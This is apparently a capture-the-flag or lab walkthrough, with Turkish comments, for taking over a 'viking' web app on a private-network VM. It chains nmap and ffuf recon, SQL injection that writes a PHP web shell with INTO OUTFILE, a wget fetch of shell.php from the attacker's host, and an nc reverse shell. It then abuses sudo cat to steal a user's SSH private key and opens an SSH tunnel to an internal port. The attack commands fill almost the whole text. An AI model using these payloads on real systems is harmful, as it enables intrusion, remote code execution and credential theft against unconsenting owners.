nmap -sn 192.168.186.0/24 # blok taraması ile ıp adresinin bul
nmap -Pn -A 192.168.186.138 # bulduğumuz ip üzerindeki portları tara
dirb http://192.168.186.138 # dirb ile dosyaların çıkmadığını görürüz, yapılmayabilinir
ffuf -u http://192.168.186.138/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fs 10701 # bu komut ile viking klasörünü buluruz.
http://192.168.186.138/viking/
http://192.168.186.138/viking/search.php?id=3' union select null, null, null, null, version()-- - # versiyona bakarız
http://192.168.186.138/viking/search.php?id=3'or 1=1 -- - # kullnıcı sayısını öğreniriz
http://192.168.186.138/viking/search.php?id=3' union select null, null, null, null, '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/viking/z.php' -- -
python3 -m http.server 4567 # aşağıdaki komutta bulunan atacağımız shell.php dosyasının bulunduğu dizine gelip daha sonra http.server komutunu çalıştır.
http://192.168.186.138/viking/z.php?cmd=wget http://192.168.186.131:4567/shell.php # bir önceki attığımız z.php dosyasını kullanarak shell.php dosyasını wget ile atarız
nc -lnvp 2375 # kendi kalimizden dinlemeye başlarız
http://192.168.186.131/shell.php # bu sayfayı çağırarak floki kullanıcısına erişim sağlarız
bin/bash -i
sudo -l # bu komuttan sonra aşağıdaki çıktıyı görürüz.
User www-data may run the following commands on redteam:
(floki) NOPASSWD: /bin/cat
sudo -u floki /bin/cat /home/floki/.ssh/id_rsa # private komutu gör
private key kendi kaline kopyala
chmod 600 /home/kali/Desktop/floki # kopyaladığın dosyaya yetki ver
ss -tupln # çalışan servisleri gör, http servisine keşfet
ssh -i floki floki@192.168.186.138 -L 3306:127.0.0.1:3306 # tespit edilen port ile kendi kalinden ters tunelleme yap
web browserden 127.0.0.1:3306 # böylece içerideki web servera bağlanırsın